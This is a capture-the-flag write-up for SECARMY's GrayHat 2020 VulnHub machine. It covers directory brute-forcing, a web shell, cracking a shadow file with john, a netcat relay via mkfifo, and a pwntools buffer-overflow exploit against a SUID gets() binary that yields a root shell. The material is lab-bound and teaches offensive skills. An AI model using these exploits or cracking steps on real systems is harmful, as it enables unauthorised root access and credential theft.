SECARMY’s CTF @ GrayHat 2020 — Write-up

Secarmy’s CTF banner at GrayHat 2020

Summary

GrayHat 2020 has ended, and a lot of great content was presented at this year's conference. During those days many villages ran their own contests, and SECARMY was no different.

Setup

To get started, download the VM from VulnHub that was built specifically for this CTF. You can find it at https://is.gd/LfvQPt.

Challenges

This CTF was composed of 10 challenges that have to be completed in order, from the first user up to root. Below is a quick description and solution for each of them.

#1: Uno

After an initial scan, we see that the machine is running a web server. This is the page we are presented with:

A welcome page asking us to search for a hidden directory.
dirsearch -u http://192.168.0.166 -E -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
A page in a hidden directory with the credential for the first user written in white.

#2: Dos

Use the credential to login as user dos.

A readme file containing instructions to proceed to the second challenge.
Search through the many files until you find a base64-encoded string.

#3: Tres

While logged in as user dos, we can also see a file called 1337.txt with the following message:

Accessing the netcat service to get the credential for user “tres”.

#4: Cuatro

The instructions cited previously make it clear that the next challenge is about binary analysis. It does not, however, involve complex reverse engineering: the binary is simply UPX-packed, so unpacking it and looking at its strings is enough.

Instructions for the fourth challenge.
upx -d secarmy-village 
strings secarmy-village
Credential for the fourth user obtained from strings.

#5: Cinco

The instructions point us to http://192.168.0.166/justanothergallery.

A web page containing a QR code image.
# Decode every QR image in the gallery straight from the HTTP response (0 to 68 inclusive)
for i in {0..68}; do curl -s http://192.168.0.166/justanothergallery/qr/image-$i.png | zbarimg -q -; done

#6: Seis

To find Cinco’s secret place we can run the following command:

find / -user cinco -type d 2>/dev/null
chmod +r shadow.bak
john --wordlist=/usr/share/wordlist/rockyou.txt shadow.bak
The cracked hash.

#7: Siete

In this challenge, we are asked to go to http://192.168.0.166/shellcmsdashboard.

A login page.
Listing files using the web shell.
The credential for the seventh user.

#8: Ocho

When logged in as siete, we can see some files related to the next challenge: a password-protected zip file, a Go file that is supposed to help but is full of syntax errors, a hint, and a pair of message and key files.

The list of files for the challenge.
package main

import "fmt"

func main() {
	chars := []byte{11, 29, 27, 25, 10, 21, 1, 0, 23, 10, 17, 12, 13, 8}

	fmt.Printf("Representation: %#v\n", chars)
	fmt.Printf("Hex: %x\n", chars)
	fmt.Printf("Int: %d\n", chars)
	fmt.Printf("Bin: %b\n", chars)
}
$ go run mighthelp.go
Representation: []byte{0xb, 0x1d, 0x1b, 0x19, 0xa, 0x15, 0x1, 0x0, 0x17, 0xa, 0x11, 0xc, 0xd, 0x8}
Hex: 0b1d1b190a150100170a110c0d08
Int: [11 29 27 25 10 21 1 0 23 10 17 12 13 8]
Bin: [1011 11101 11011 11001 1010 10101 1 0 10111 1010 10001 1100 1101 1000]
>>> "".join([chr(x ^ 120) for x in bytearray([11, 29, 27, 25, 10, 21, 1, 0, 23, 10, 17, 12, 13, 8])])
'secarmyxoritup'
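The one-liner above already knows that the key is 120 (ASCII 'x'). The following script is an added example, not part of the original write-up, that shows how you would recover that key from the bytes alone when the key file is missing or unreadable: every single-byte XOR key is tried, results that are not printable ASCII are discarded, and the survivors are ranked by how much they look like lowercase text. The byte array is the one printed by mighthelp.go; the scoring heuristic is my own choice.

```python
import string

# The 14 bytes from the challenge's mighthelp.go
CHARS = bytes([11, 29, 27, 25, 10, 21, 1, 0, 23, 10, 17, 12, 13, 8])

# Characters we expect in a short lowercase credential/passphrase
LIKELY = set(string.ascii_lowercase.encode() + b" ")


def xor_decode(data: bytes, key: int) -> bytes:
    """XOR every byte with the same single-byte key."""
    return bytes(b ^ key for b in data)


def score(plaintext: bytes) -> int:
    """Crude English-likeness: number of lowercase letters and spaces."""
    return sum(1 for b in plaintext if b in LIKELY)


def brute_force_single_byte_xor(data: bytes):
    """Try all 256 keys, keep only fully printable results, best score first.
    Returns a list of (key, plaintext) tuples; sort is stable, so ties keep
    ascending key order."""
    candidates = []
    for key in range(256):
        pt = xor_decode(data, key)
        if all(0x20 <= b <= 0x7E for b in pt):
            candidates.append((key, pt.decode("ascii")))
    candidates.sort(key=lambda kp: score(kp[1].encode()), reverse=True)
    return candidates


if __name__ == "__main__":
    for key, pt in brute_force_single_byte_xor(CHARS)[:5]:
        print(f"key={key:3d} ({chr(key)!r}): {pt}")
```

Because all 14 input bytes are below 32, only the low five bits of the key change the letters and the high three bits pick the ASCII block; that is why the top two hits are 'x' (lowercase) and 'X' (the same text in uppercase), and the lowercase heuristic puts 'x' first.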

#9: Nueve

For this challenge, we are given a PCAP file called keyboard.pcapng. Opening it in Wireshark, we can find some HTTP requests.

Network packet analysis with Wireshark.
A message disclosing a string of interest inside the file none.txt.

#10: Root

We finally got to the final stage! In this last challenge, we are given a SUID binary that we must exploit to get a root shell. The program reads user input with gets() and simply exits if the check on the value next to the buffer fails.

Listing and execution of the exploitable program.
undefined8 main(void)
{
    char local_28 [24];   /* buffer at rbp-0x28 */
    long local_10;        /* sits right after the buffer, at rbp-0x10 */

    local_10 = 0;
    setbuf(stdout,(char *)0x0);
    setbuf(stdin,(char *)0x0);
    setbuf(stderr,(char *)0x0);
    puts("hello pwner ");
    puts("pwnme if u can ;) ");
    gets(local_28);       /* no bounds check: 24 bytes of padding reach local_10 */
    if (local_10 == 0xcafebabe) {
        setuid(0);
        setgid(0);
        seteuid(0);
        setegid(0);
        execvp("/bin/sh",(char **)0x0);
    }
    return 0;
}
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|./orangutan 2>&1|nc -lvp 2222 >/tmp/f
from pwn import *

offset = b"A" * 24                 # fill local_28 up to local_10
secret = b"\xbe\xba\xfe\xca"       # 0xcafebabe, little-endian
payload = offset + secret

io = remote('192.168.0.166', 2222)
print(io.recvline())
print(io.recvline())
io.sendline(payload)
io.interactive()
Result of executing the exploit.
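To make explicit why 24 bytes of padding plus a 4-byte little-endian 0xcafebabe is enough, here is an added example (mine, not from the original write-up) that models the two locals of the decompiled frame and replays gets() over them. The layout follows the Ghidra names, local_28 at rbp-0x28 and local_10 at rbp-0x10, so the 24-byte buffer ends exactly where the 8-byte long begins; that adjacency is the only assumption. Anything written past the long (saved rbp, return address) is reported as an overrun rather than modelled.

```python
import struct
from collections import namedtuple

# Frame layout from the decompilation (assumed adjacent, as the names suggest):
#   rbp-0x28 .. rbp-0x10 : char local_28[24]
#   rbp-0x10 .. rbp-0x08 : long local_10   (initialised to 0 in main)
BUF_SIZE = 24
LONG_OFFSET = BUF_SIZE
LOCALS_SIZE = BUF_SIZE + 8

Result = namedtuple("Result", "local_10 past_locals")


def build_payload(secret: int = 0xCAFEBABE, offset: int = BUF_SIZE) -> bytes:
    """Padding to reach local_10, then the secret as a little-endian 32-bit value."""
    return b"A" * offset + struct.pack("<I", secret)


def simulate_gets(line: bytes) -> Result:
    """Replay gets(local_28) on the frame above: every byte of the line plus the
    NUL terminator is copied with no bounds check, then local_10 is read the
    way x86-64 reads a long (8 bytes, little-endian)."""
    frame = bytearray(LOCALS_SIZE)          # local_10 = 0 at function entry
    data = line + b"\x00"                   # gets() appends the terminator
    for i, b in enumerate(data[:LOCALS_SIZE]):
        frame[i] = b
    local_10 = struct.unpack_from("<Q", frame, LONG_OFFSET)[0]
    return Result(local_10, len(data) > LOCALS_SIZE)


if __name__ == "__main__":
    r = simulate_gets(build_payload())
    print(f"local_10 = {r.local_10:#x}, overran locals: {r.past_locals}")
```

Only four bytes of the secret need to be sent: the NUL that gets() appends lands on byte 4 of the long and the remaining three bytes are still zero from the initialisation, so the comparison against 0xcafebabe succeeds without touching the saved frame pointer or the return address. Sending the secret big-endian, or with the wrong padding length, leaves local_10 at a different value and the SUID branch is never taken.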

Offensive security practitioner for fun and open source enthusiast. Sometimes I research or break something.